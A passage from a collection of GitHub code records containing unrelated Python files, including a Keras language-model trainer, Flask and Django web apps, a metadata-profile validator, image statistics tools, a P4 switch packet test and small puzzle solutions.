0.29\nset_session(tf.Session(config=config))\n\nembed_dim = 16\nbatch_size = 128 # Batch size for training.\nepochs = 1 # Number of epochs to train for.\nlatent_dim = 128 # Latent dimensionality of the encoding space.\n\nwith h5py.File(sys.argv[1], 'r') as hf:\n output_text = hf['output'][:]\ndecoder_target_data = np.reshape(output_text, (output_text.shape[0], output_text.shape[1], 1))\ndecoder_input_data = np.zeros((output_text.shape[0], output_text.shape[1], 1), dtype='uint8')\ndecoder_input_data[:,1:,:] = decoder_target_data[:,:-1,:]\nmax_decoder_seq_length = output_text.shape[1]\nnum_encoder_tokens = len(encoding.char_list)\n\nprint(\"Number of sentences: \", output_text.shape[0])\nprint(\"Sentence length: \", output_text.shape[1])\nprint(\"Number of chars: \", num_encoder_tokens)\n\n# Define an input sequence and process it.\nreshape1 = Reshape((-1, embed_dim))\nembed = Embedding(num_encoder_tokens, embed_dim)\nconv = Conv1D(128, 5, padding='causal', activation='tanh')\nconv2 = Conv1D(128, 1, padding='causal', activation='tanh')\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, 1))\n# We set up our decoder to return full output sequences,\n# and to return internal states as well. We don't use the\n# return states in the training model, but we will use them in inference.\ndecoder_lstm = CuDNNLSTM(2*latent_dim, return_sequences=True)\ndecoder_lstm2 = CuDNNLSTM(latent_dim, return_sequences=True)\n\ndec_lstm_input = conv2(conv(reshape1(embed(decoder_inputs))))\n\ndecoder_outputs = decoder_lstm2(decoder_lstm(dec_lstm_input))\ndecoder_dense = Dense(num_encoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model(decoder_inputs, decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['sparse_categorical_accuracy'])\nmodel.summary()\nmodel.fit(decoder_input_data, decoder_target_data,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=0.2)\n# Save model\nmodel.save('language.h5')\n#model.load_weights('s2s.h5')\n","repo_name":"jmvalin/DeepProof","sub_path":"language_train.py","file_name":"language_train.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"41"} +{"seq_id":"34598197229","text":"\"\"\"https://docs.celeryproject.org/en/stable/django/first-steps-with-django.html\nhttps://www.section.io/engineering-education/django-celery-tasks/\nhttps://buildwithdjango.com/blog/post/celery-progress-bars/\nhttps://github.com/czue/celery-progress\n\"\"\"\nimport os\nfrom celery import Celery\nfrom . import settings\n\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wama.settings')\n# app = Celery('wama', broker='redis://127.0.0.1:6379//')\napp = Celery('wama')\n\n# Using a string here means the worker doesn't have to serialize\n# the configuration object to child processes.\n# - namespace='CELERY' means all celery-related configuration keys\n# should have a `CELERY_` prefix.\napp.config_from_object('django.conf:settings', namespace='CELERY')\n\n# Load task modules from all registered Django app configs.\n# app.autodiscover_tasks()\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(f'Request: {self.request!r}')\n\n\n@app.task\ndef do_work(self, list_of_work, progress_observer):\n total_work_to_do = len(list_of_work)\n for i, work_item in enumerate(list_of_work):\n # do_work_item(work_item)\n # tell the progress observer how many out of the total items we have processed\n progress_observer.set_progress(i, total_work_to_do)\n return 'work is complete'\n","repo_name":"fmoreau69/webapp-for-autormatic-media-anonymization","sub_path":"wama/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"41486902564","text":"\"\"\"Classes for Python objects derived from CSV files.\"\"\"\n\nimport re\nfrom dataclasses import dataclass, field\nfrom typing import List\nfrom .utils import is_uri_or_prefixed_uri\n\n\n@dataclass\nclass TAPStatementTemplate:\n \"\"\"Instances hold TAP/CSV elements related to statement templates.\"\"\"\n\n # pylint: disable=too-many-instance-attributes # It's a dataclass, right?\n # pylint: disable=invalid-name # for elements not named in snake case.\n\n propertyID: str = \"\"\n propertyLabel: str = \"\"\n mandatory: str = \"\"\n repeatable: str = \"\"\n valueNodeType: str = \"\"\n valueDataType: str = \"\"\n valueConstraint: str = \"\"\n valueConstraintType: str = \"\"\n valueShape: str = \"\"\n note: str = \"\"\n state_warns: dict = field(default_factory=dict)\n state_extras: dict = field(default_factory=dict)\n\n def normalize(self, settings):\n \"\"\"Normalizes specific fields.\"\"\"\n # pylint: disable=attribute-defined-outside-init\n self._warn_if_propertyID_or_valueDataType_not_IRIlike()\n self._normalize_booleans_mandatory_repeatable()\n self._valueConstraintType_pattern_warn_if_valueConstraint_not_valid_regex()\n self._valueConstraintType_pattern_warn_if_used_with_value_shape()\n self._valueConstraintType_iristem_parse()\n self._valueConstraintType_iristem_warn_if_list_items_not_IRIs()\n self._valueConstraintType_languageTag_parse(settings)\n self._valueConstraintType_warn_if_used_without_valueConstraint()\n self._valueDataType_warn_if_used_with_valueNodeType_IRI()\n self._valueDataType_warn_if_valueNodeType_literal_used_with_any_valueShape()\n self._valueConstraintType_picklist_parse(settings)\n self._valueNodeType_is_from_enumerated_list(settings)\n self._parse_elements_configured_as_list_elements(settings)\n return self\n\n def _warn_if_propertyID_or_valueDataType_not_IRIlike(self):\n \"\"\"@@@\"\"\"\n if not is_uri_or_prefixed_uri(self.propertyID):\n self.state_warns[\n \"propertyID\"\n ] = f\"{repr(self.propertyID)} is not an IRI or Compact IRI.\"\n if self.valueDataType:\n if not is_uri_or_prefixed_uri(self.valueDataType):\n self.state_warns[\n \"valueDataType\"\n ] = f\"{repr(self.valueDataType)} is not an IRI or Compact IRI.\"\n\n def _normalize_booleans_mandatory_repeatable(self):\n \"\"\"Booleans take true/false (case-insensitive) or 1/0, default None.\"\"\"\n\n valid_values_for_true = [\"true\", \"1\"]\n valid_values_for_false = [\"false\", \"0\"]\n valid_values = valid_values_for_true + valid_values_for_false\n\n # pylint: disable=singleton-comparison\n if self.mandatory:\n mand = self.mandatory.lower()\n if mand not in valid_values:\n self.state_warns[\n \"mandatory\"\n ] = f\"{repr(self.mandatory)} is not a supported Boolean value.\"\n if mand in valid_values_for_true:\n self.mandatory = \"true\"\n elif mand in valid_values_for_false:\n self.mandatory = \"false\"\n\n if self.repeatable:\n repeat = self.repeatable.lower()\n if repeat not in valid_values:\n self.state_warns[\n \"repeatable\"\n ] = f\"{repr(self.repeatable)} is not a supported Boolean value.\"\n if repeat in valid_values_for_true:\n self.repeatable = \"true\"\n elif repeat in valid_values_for_false:\n self.repeatable = \"false\"\n\n return self\n\n def _valueConstraintType_iristem_parse(self):\n \"\"\"If valueConstraintType is Iristem, split valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"iristem\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split()\n return self\n\n def _valueConstraintType_iristem_warn_if_list_items_not_IRIs(self):\n \"\"\"If IRIStem, warn if valueConstraint list items do not look like IRIs.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"iristem\":\n for list_item in self.valueConstraint:\n if not is_uri_or_prefixed_uri(list_item):\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type is {repr(self.valueConstraintType)}, \"\n f\"but {repr(list_item)} does not look like an IRI or \"\n \"Compact IRI.\"\n )\n return self\n\n def _valueConstraintType_pattern_warn_if_valueConstraint_not_valid_regex(self):\n \"\"\"If valueConstraintType Pattern, warn if valueConstraint not valid regex.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"pattern\":\n try:\n re.compile(self.valueConstraint)\n except (re.error, TypeError):\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type is {repr(self.valueConstraintType)}, but \"\n f\"{repr(self.valueConstraint)} is not a valid regular expression.\"\n )\n return self\n\n def _valueConstraintType_pattern_warn_if_used_with_value_shape(self):\n \"\"\"Regular expressions cannot conform to value shapes.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n if self.valueConstraintType == \"pattern\":\n if self.valueShape:\n self.state_warns[\"valueConstraintType\"] = (\n f\"Value constraint type \"\n f\"({repr(self.valueConstraintType)}) \"\n \"cannot conform to a value shape.\"\n )\n\n def _valueConstraintType_languageTag_parse(self, settings):\n \"\"\"For valueConstraintType languageTag, splits valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n sep = settings.get(\"list_item_separator\", \" \")\n if self.valueConstraintType == \"languagetag\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split(sep)\n self.valueConstraint = [x.strip() for x in self.valueConstraint if x]\n return self\n\n def _valueConstraintType_warn_if_used_without_valueConstraint(self):\n \"\"\"Warns if valueConstraintType used without valueConstraint.\"\"\"\n if self.valueConstraintType:\n if not self.valueConstraint:\n self.state_warns[\"valueConstraint\"] = (\n f\"Value constraint type \"\n f\"({repr(self.valueConstraintType)}) \"\n \"but no value constraint.\"\n )\n return self\n\n def _valueConstraintType_picklist_parse(self, settings):\n \"\"\"If valueConstraintType is Picklist, split valueConstraint on whitespace.\"\"\"\n self.valueConstraintType = self.valueConstraintType.lower()\n sep = settings.get(\"list_item_separator\", \" \")\n if self.valueConstraintType == \"picklist\":\n if self.valueConstraint:\n self.valueConstraint = self.valueConstraint.split(sep)\n self.valueConstraint = [x.strip() for x in self.valueConstraint if x]\n return self\n\n def _valueNodeType_is_from_enumerated_list(self, settings):\n \"\"\"Take valueNodeType from configurable enumerated list, case-insensitive.\"\"\"\n valid_types = [\"iri\", \"bnode\", \"literal\"]\n if settings.get(\"value_node_types\"):\n valid_types += [vnt.lower() for vnt in settings[\"value_node_types\"]]\n if self.valueNodeType:\n self.valueNodeType = self.valueNodeType.lower() # normalize to lowercase\n if self.valueNodeType not in valid_types:\n self.state_warns[\n \"valueNodeType\"\n ] = f\"{repr(self.valueNodeType)} is not a valid node type.\"\n return self\n\n def _valueDataType_warn_if_valueNodeType_literal_used_with_any_valueShape(self):\n \"\"\"Value with node type Literal cannot conform to a value shape.\"\"\"\n self.valueNodeType = self.valueNodeType.lower()\n if self.valueShape:\n if self.valueNodeType == \"literal\":\n self.state_warns[\"valueDataType\"] = (\n \"Datatypes are only for literals, \"\n \"which cannot conform to a value shape.\"\n )\n\n def _valueDataType_warn_if_used_with_valueShape(self):\n \"\"\"Value with any datatype cannot conform to a value shape.\"\"\"\n if self.valueShape:\n if self.valueDataType:\n self.state_warns[\"valueDataType\"] = (\n \"Datatypes are only for literals, \"\n \"which cannot conform to a value shape.\"\n )\n\n def _valueDataType_warn_if_used_with_valueNodeType_IRI(self):\n \"\"\"Value with datatype implies Literal and cannot be node type IRI.\"\"\"\n node_type = self.valueNodeType.lower()\n if node_type in (\"iri\", \"uri\", \"bnode\"):\n if self.valueDataType:\n self.state_warns[\"valueDataType\"] = (\n f\"Datatypes are only for literals, \"\n f\"so node type should not be {repr(self.valueNodeType)}.\"\n )\n\n def _parse_elements_configured_as_list_elements(self, settings):\n \"\"\"Parse elements configured as list elementss.\"\"\"\n if settings.get(\"list_item_separator\"):\n separator = settings.get(\"list_item_separator\")\n else:\n separator = \" \"\n\n if settings.get(\"list_elements\"):\n list_elements = settings.get(\"list_elements\")\n else:\n list_elements = []\n\n for element in list_elements:\n if getattr(self, element):\n setattr(self, element, getattr(self, element).split(separator))\n\n return self\n\n def get_warnings(self):\n \"\"\"Emit self.state_warns as populated by self.normalize().\"\"\"\n return dict(self.state_warns)\n\n\n@dataclass\nclass TAPShape:\n \"\"\"An instance holds TAP/CSV row elements related to one given, named shape.\"\"\"\n\n # pylint: disable=invalid-name\n # True that propertyID, etc, do not conform to snake-case naming style.\n\n shapeID: str = \"\"\n shapeLabel: str = \"\"\n state_list: List[TAPStatementTemplate] = field(default_factory=list)\n shape_warns: dict = field(default_factory=dict)\n shape_extras: dict = field(default_factory=dict)\n\n def normalize(self, settings):\n \"\"\"Normalize values where required.\"\"\"\n self._normalize_default_shapeID(settings)\n return True\n\n def _normalize_default_shapeID(self, settings):\n \"\"\"If shapeID not specified, looks first in config, else sets \"default\".\"\"\"\n if not self.shapeID:\n self.shapeID = settings.get(\"default_shape_identifier\", \"default\")\n return self\n\n def get_warnings(self):\n \"\"\"Emit warnings dictionary self.shape_warns, populated by normalize() method.\"\"\"\n return dict(self.shape_warns)\n","repo_name":"philbarker/dctap-python","sub_path":"dctap/tapclasses.py","file_name":"tapclasses.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"17963022030","text":"from flask import Flask, render_template, request\r\nfrom db import db\r\nimport math\r\n\r\nPAGE_SIZE = 10\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home', methods=[\"GET\", \"POST\"])\r\ndef home():\r\n # get paging parameter from GET string\r\n try:\r\n page = int(request.args.get('page', 1))\r\n except ValueError:\r\n page = 1\r\n\r\n # set detault to 1 if page is less than 1\r\n if page < 1:\r\n page = 1\r\n\r\n cursor = db().cursor()\r\n\r\n sql = (\"SELECT DISTINCT movie_imdb_rating.movie_id, COUNT(*) max_count \"\r\n \"FROM poster INNER JOIN movie_imdb_rating \"\r\n \"ON movie_imdb_rating.movie_id=poster.movie_id \"\r\n \"ORDER BY rating_wa DESC \")\r\n\r\n cursor.execute(sql)\r\n max_count = cursor.fetchone()['max_count']\r\n\r\n cursor.execute(\r\n \"SELECT DISTINCT movie_imdb_rating.movie_id, poster.poster, \"\r\n \"poster.title, movie_imdb_rating.rating_wa \"\r\n \"FROM poster INNER JOIN movie_imdb_rating \"\r\n \"ON movie_imdb_rating.movie_id=poster.movie_id \"\r\n \"ORDER BY rating_wa DESC \"\r\n \"LIMIT {}, {}\".format(\r\n (page - 1) * PAGE_SIZE, PAGE_SIZE)\r\n )\r\n\r\n page_count = math.ceil(max_count / PAGE_SIZE)\r\n\r\n return render_template('movie.html', movies=cursor, page_count=page_count,\r\n page=page, page_size=PAGE_SIZE)\r\n\r\n\r\n@app.route('/celebs')\r\ndef celebs():\r\n return render_template('celebs.html')\r\n\r\n\r\n@app.route('/ratings')\r\ndef ratings():\r\n return render_template('ratings.html')\r\n\r\n\r\n@app.route('/contact')\r\ndef contact():\r\n return render_template('contact.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run('127.0.0.1', 8080, True)\r\n","repo_name":"hettmett/aca_project_2019","sub_path":"pjweb.py","file_name":"pjweb.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"44193922274","text":"from django import forms\nfrom .models import Expense, GroupUser, Group\n\n\nclass GroupForm(forms.ModelForm):\n\n class Meta:\n model = Group\n fields = [\n 'name',\n ]\n\n\nclass ExpenseForm(forms.ModelForm):\n paid_date = forms.DateTimeField(widget=forms.DateTimeInput(format='%Y-%m-%d %H:%M'))\n\n class Meta:\n model = Expense\n fields = [\n 'title',\n 'price',\n 'paid_date',\n 'paid_by',\n 'split_with',\n 'comment'\n ]\n widgets = {\n 'split_with': forms.CheckboxSelectMultiple(),\n }\n\n\nclass SettleUpForm(forms.ModelForm):\n paid_to = forms.ModelChoiceField(queryset=GroupUser.objects.all())\n\n class Meta:\n model = Expense\n fields = [\n 'price',\n 'paid_date',\n 'paid_by',\n 'paid_to',\n ]\n\n labels = {\n 'price': 'Gave back',\n }","repo_name":"ViktoriaMelnyk/shared_expenses","sub_path":"groups/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"18945539232","text":"import rasterio\nimport os\nfrom multiprocessing import Pool\nimport tqdm\nimport json\nimport numpy as np\nimport tifffile\n\n\ndef check_image_stats_eurosat(path):\n\n \"\"\" Check channelwise statistics for multispectral image. \"\"\"\n\n image_stats = []\n img = rasterio.open(path).read()\n img = np.float64(img)\n for ch in range(img.shape[0]):\n image_stats.append({'min': img[ch, :, :].min().item(),\n 'max': img[ch, :, :].max().item(),\n 'mean': img[ch, :, :].mean().item(),\n 'var': img[ch, :, :].var().item(),\n 'std': img[ch, :, :].std().item(),\n 'sum_square_over_n': (img[ch, :, :]**2).mean().item()})\n return image_stats\n\n\ndef check_image_stats(path):\n\n \"\"\" Check channelwise statistics for multispectral image. \"\"\"\n\n image_stats = []\n img = tifffile.imread(path)\n img = np.float64(img)\n for ch in range(img.shape[-1]):\n image_stats.append({'min': img[:, :, ch].min().item(),\n 'max': img[:, :, ch].max().item(),\n 'mean': img[:, :, ch].mean().item(),\n 'var': img[:, :, ch].var().item(),\n 'std': img[:, :, ch].std().item(),\n 'sum_square_over_n': (img[:, :, ch]**2).mean().item()})\n return image_stats\n\n\ndef check_dataset_stats(root_dir, save=False, eurosat=False, filename=None):\n\n \"\"\" Getting channelwise statistics for the dataset. \"\"\"\n\n # collect all images\n image_paths = []\n if eurosat:\n class_folders = os.listdir(root_dir)\n for folder in class_folders:\n class_path = os.path.join(root_dir, folder)\n image_names = os.listdir(class_path)\n for image_name in image_names:\n image_paths.append(os.path.join(class_path, image_name))\n example_image = rasterio.open(image_paths[0]).read()\n num_channels = example_image.shape[0]\n else:\n image_names = os.listdir(root_dir)\n for image_name in image_names:\n image_paths.append(os.path.join(root_dir, image_name))\n example_image = tifffile.imread(image_paths[0])\n num_channels = example_image.shape[-1]\n num_images = len(image_paths)\n print('Calculating statistics on {} images.'.format(num_images))\n\n # checking image statistics separately\n all_image_stats = []\n check_image = check_image_stats_eurosat if eurosat else check_image_stats\n with Pool(1) as p:\n for stats in tqdm.tqdm(p.imap(check_image, image_paths), total=len(image_paths)):\n all_image_stats.append(stats)\n\n # aggregating statistics for the whole dataset\n channelwise_stats = []\n for i in range(num_channels):\n channelwise_stats.append({'min': 10e9, 'max': -1, 'mean': 0, 'var': 0, 'std': 0})\n means, ssqn = [[] for _ in range(num_channels)], [[] for _ in range(num_channels)]\n\n for j, stats in enumerate(all_image_stats):\n for i in range(num_channels):\n channelwise_stats[i]['min'] = min(stats[i]['min'], channelwise_stats[i]['min'])\n channelwise_stats[i]['max'] = max(stats[i]['max'], channelwise_stats[i]['max'])\n channelwise_stats[i]['mean'] += (stats[i]['mean'] - channelwise_stats[i]['mean']) / (j + 1)\n means[i].append(stats[i]['mean'])\n ssqn[i].append(stats[i]['sum_square_over_n'])\n for ch, channel in enumerate(channelwise_stats):\n sqm = (np.array(means[ch]).mean()**2).item() # squared mean\n var = 1/num_images * np.array(ssqn[ch]).sum() - sqm # dataset variance from image variances\n channel['var'], channel['std'] = var, var**.5\n print('min: {} \\t max: {} \\t mean: {:.02f} '.format(channel['min'], channel['max'], channel['mean'],) +\n '\\t var: {:.02f} \\t std: {:.02f}'.format(channel['var'], channel['std']))\n\n if save:\n filename = filename if filename is not None else 'spectrum_stats.json'\n with open(os.path.join(filename), 'w') as fout:\n json.dump(channelwise_stats, fout)\n\n return channelwise_stats\n\n\nif __name__ == '__main__':\n\n # check_dataset_stats('/home/mate/dataset/EuroSATallBands_train', save=True)\n check_dataset_stats('/home/mate/datasets/grss/Track1-MSI_A_train', save=True, eurosat=False,\n filename='gfc_channel_stats.json')\n # check_dataset_stats('C:\\datasets\\grss\\debug', save=True, eurosat=False)\n # check_dataset_stats('C:\\datasets\\debug', save=True, eurosat=True)\n # check_dataset_stats('/datasets/EuroSATallBands_test', save=True)\n\n\n","repo_name":"mkisantal/nonrgb-transfer","sub_path":"hsi_stats.py","file_name":"hsi_stats.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"14131359032","text":"'''\nhttps://www.codewars.com/kata/577bd026df78c19bca0002c0/train/python\n'''\n\ndef correct(s):\n for i in s:\n if i == '5':\n s = s.replace('5', 'S')\n elif i == '0':\n s = s.replace('0', 'O')\n elif i == '1':\n s = s.replace('1', 'I')\n return s \n\n\ndef correct(string):\n return string.translate(str.maketrans(\"501\", \"SOI\"))","repo_name":"Lebivans/Code_Wars","sub_path":"CodeWars/8 kyu/Correct_the_mistakes_of_the_character_recognition_software.py","file_name":"Correct_the_mistakes_of_the_character_recognition_software.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"17018823863","text":"class PortocolTest(pd_base_tests.ThriftInterfaceDataPlane):\n\tdef __init__(self):\n\t\tpd_base_tests.ThriftInterfaceDataPlane.__init__(self, [\"p4hdp\"])\n\n\tdef runTest(self):\n\t\tprint\n\t\tsess_hdl = self.conn_mgr.client_init()\n\n\t\tdev_tgt = DevTarget_t(0, hex_to_i16(0xFFFF))\n\t\tdevice = 0\n\n\t\n\t\t# p4hdp_carrier_port_ecmp_group_setup(self.client, sess_hdl, dev_tgt)\n\n\n\t\t# protocol_identify_setup(self.client, sess_hdl, dev_tgt)\n\t\t# p4hdp_inner_ports_setup(self.client, sess_hdl, dev_tgt)\n\t\t# carrier_ports_vlan_map_entry_setup(self.client, sess_hdl, dev_tgt)\n\t\t# inner_vlan_port_map_entry_setup(self.client, sess_hdl, dev_tgt)\n\n\n\n\t\t# client_init(self.client, sess_hdl, dev_tgt)\n\n\t\t# #Add the default entries\n\t\t# populate_default_entries(self.client, sess_hdl, dev_tgt, ipv6_enabled,\n\t\t# acl_enabled, tunnel_enabled, multicast_enabled,\n\t\t# int_enabled)\n\t\t# ret_init = populate_init_entries(\n\t\t# self.client, sess_hdl, dev_tgt, rewrite_index, rmac,\n\t\t# inner_rmac_group, outer_rmac_group, ipv6_enabled, tunnel_enabled)\n\n\t\t# mdp_virtual_test_intf_config(self.client, sess_hdl, dev_tgt)\n\n\t\t# mdp_virtual_test_user_config(self.client, sess_hdl, dev_tgt)\n\n\t\t# mdp_virtual_test_arp_config(self.client, sess_hdl, dev_tgt)\n\t\t# #mdp_virtual_test_user_print()\n\t\t#mdp_virtual_test_route_config(self.client, sess_hdl, dev_tgt)\n\n\n\t\tself.conn_mgr.complete_operations(sess_hdl)\n\n\n\t\t# carrier_client_port = 1\n\t\t# carrier_network_port = 2\n\n\t\t# carrier_client_port_vlan = 10\n\t\t# carrier_network_port_vlan = 20\n\n\t\t# inner_protocol_port = 4\n\n\n\t\t# print \"Checking load-balancing between 2 members\"\n\t\t# npkts = 4\n\t\t# counts = [0, 0]\n\t\t# for i in xrange(npkts):\n\t\t# ip_dst = \"192.168.0.{}\".format(i)\n\t\t# pkt = simple_tcp_packet(pktlen=124, eth_dst='00:33:33:33:33:33', ip_dst=ip_dst, tcp_dport=117)\n\t\t# exp_pkt1 = simple_tcp_packet(pktlen=128, eth_dst='00:33:33:33:33:33', dl_vlan_enable=True, vlan_vid=200, ip_dst=ip_dst, tcp_dport=117)\n\n\t\t# send_packet(self, carrier_network_port, str(pkt))\n\t\t# eg_idx = verify_packet_any_port(self, exp_pkt1, [7, 8])\n\t\t# counts[eg_idx[0]] += 1\n\t\t# #self.assertTrue(counts[0] >= npkts / 4)\n\t\t# #self.assertTrue(counts[1] >= npkts / 4)\n\t\t# print \"Checking load-balancing between 2 members: \", counts[0], counts[1],\n\t\t# #self.assertTrue(counts[0] + counts[1] == npkts)\n\n\t\t# print \"Checking inner tcp bgp protocol pkt\"\n\t\t# pkt1 = simple_tcp_packet(tcp_dport=179) \n\t\t# pkt = simple_gre_packet(\n\t\t# pktlen=124, \n\t\t# eth_src='00:77:66:55:44:33',\n\t\t# eth_dst='00:55:55:55:55:55',\n\t\t# ip_id=0,\n\t\t# ip_dst='10.200.1.3',\n\t\t# ip_src='10.100.1.1',\n\t\t# ip_ttl=64,\n\t\t# inner_frame=pkt1['IP'])\n\t\t# exp_pkt = simple_gre_packet(\n\t\t# pktlen=128,\n\t\t# dl_vlan_enable=True,\n\t\t# vlan_vid=100,\n\t\t# eth_src='00:77:66:55:44:33',\n\t\t# eth_dst='00:55:55:55:55:55',\n\t\t# ip_id=0,\n\t\t# ip_dst='10.200.1.3',\n\t\t# ip_src='10.100.1.1',\n\t\t# ip_ttl=64,\n\t\t# inner_frame=pkt1['IP']) \n\t\t# send_packet(self, carrier_client_port, str(pkt))\n\t\t# print \"Expecting packet on port\", inner_protocol_port\n\t\t# verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Checking upd_dhcp protocol pkt\"\n\t\t# pkt = simple_udp_packet(udp_dport=67) \n\t\t# exp_pkt = simple_udp_packet(pktlen=104,\n\t\t# dl_vlan_enable=True,\n\t\t# vlan_vid=100, udp_dport=67)\n\n\t\t# send_packet(self, carrier_client_port, str(pkt))\n\t\t# print \"Expecting packet on port\", inner_protocol_port\n\t\t# verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Checking l2 arp protocol pkt\"\n\t\t# pkt = simple_arp_packet(pktlen=100) \n\t\t# exp_pkt = simple_arp_packet(pktlen=104, vlan_vid=200)\n\n\t\t# send_packet(self, 5, str(pkt))\n\t\t# #verify_packets(self, exp_pkt, [inner_protocol_port])\n\n\n\t\t# print \"Sending packet port 4 -> port 3 \"\n\t\t# # pkt = simple_tcp_packet(\n\t\t# # eth_dst='02:01:00:00:06:0c',\n\t\t# # eth_src='00:12:01:00:00:01',\n\t\t# # ip_dst='2.2.2.22',\n\t\t# # ip_src='15.0.0.2',\n\t\t# # ip_id=101,\n\t\t# # ip_ttl=64,\n\t\t# # ip_ihl=5)\n\n\t\tpkt = simple_tcp_packet(\n\t\t\t eth_dst='04:01:03:00:06:0B',\n\t\t\t eth_src='00:11:01:00:00:01',\n\t\t\t ip_dst='20.0.0.2',\n\t\t\t ip_src='10.0.0.2',\n\t\t\t ip_id=101,\n\t\t\t ip_ttl=64,\n\t\t\t ip_ihl=5)\n\n \n\t\tsend_packet(self, 5, str(pkt))\n\n\n\n\n\t\tpppoePkt = simple_pppoe_packet(\n\t\t\t\t\teth_dst='02:01:00:00:06:0c',\n\t\t\t\t\teth_src='00:12:01:00:00:01',\n\t\t\t\t\tip_dst='2.2.2.222',\n\t\t\t\t\tip_src='15.0.0.2',\n\t\t\t\t\tpppoe_version=1,\n\t\t\t\t\tpppoe_type=1,\n\t\t\t\t\tpppoe_code=0,\n\t\t\t\t\tpppoe_session=1)\n \n\n\t\tsend_packet(self, 3, str(pppoePkt))\n\n\n\n\t\tself.conn_mgr.complete_operations(sess_hdl)\n\t\tself.conn_mgr.client_cleanup(sess_hdl)\n","repo_name":"ncutwy/yuanbao","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"19486517062","text":"from flask import Flask, request, jsonify\nfrom flask_pymongo import PyMongo\nfrom bson.json_util import dumps\nimport json\nimport bson\nfrom bson.objectid import ObjectId\nfrom bson import json_util\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'books'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/books'\n\nmongo = PyMongo(app)\n\n@app.route('/books', methods=['POST','GET'])\ndef books():\n books = mongo.db.books_collection\n if request.method == 'POST': \n book = {}\n result = json.loads(request.get_data(as_text=True))\n book['title']=result['title']\n book['author'] = result['author']\n book['price']=result['price']\n output = books.insert(book)\n data = dumps(output)\n elif request.method == 'GET':\n output = books.find()\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/title/', methods=['GET'])\ndef get_book_by_title(title):\n books = mongo.db.books_collection\n output = books.find_one({'title': title})\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/author/<author>', methods=['GET'])\ndef get_book_by_author(author):\n books = mongo.db.books_collection\n output = books.find_one({'author': author})\n data = dumps(output)\n return jsonify({\"Status\": \"OK\", \"data\": data})\n\n@app.route('/books/delete/<oid>', methods=['DELETE'])\ndef delete_book(oid):\n books = mongo.db.books_collection\n try:\n output = books.delete_one({'_id': ObjectId(oid)})\n #data = dumps(output,default=json_util.default)\n return jsonify({\"Status\": \"OK\"})\n except e:\n return jsonify({\"Error\":\"404\"})\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Agarka/Multi-User-Shared-Shopping-Cart","sub_path":"Product Catalog/src/sample/restful_product.py","file_name":"restful_product.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"8432368133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 5 10:51:14 2018\n\n@author: simon\n\"\"\"\n\nfrom math import ceil\nimport numpy as np\nfrom collections import defaultdict\ndef cube_lst(k):\n # k = power of is the number of digits in the cubes\n # 10**(k-1) <= n**3 < 10**(k)\n n_range = np.arange(ceil(10**((k-1)/3)), ceil(10**((k)/3)))\n cubes = np.power(n_range,3)\n return cubes\n\nassert np.all(np.equal(np.array([125, 216, 343, 512, 729]),cube_lst(3)))\n\ndef dig_freq(num):\n numstr = str(num)\n digs = range(0,10)\n freq = defaultdict(int)\n for char in numstr:\n freq[int(char)]+= 1\n return tuple([freq[x] for x in digs])\n\nassert dig_freq(1112999) == (0,3,1,0,0,0,0,0,0,3)\n\n\ncubelen = 2\nwhile True:\n permutes = defaultdict(int)\n for cube in cube_lst(cubelen):\n permutes[dig_freq(cube)] += 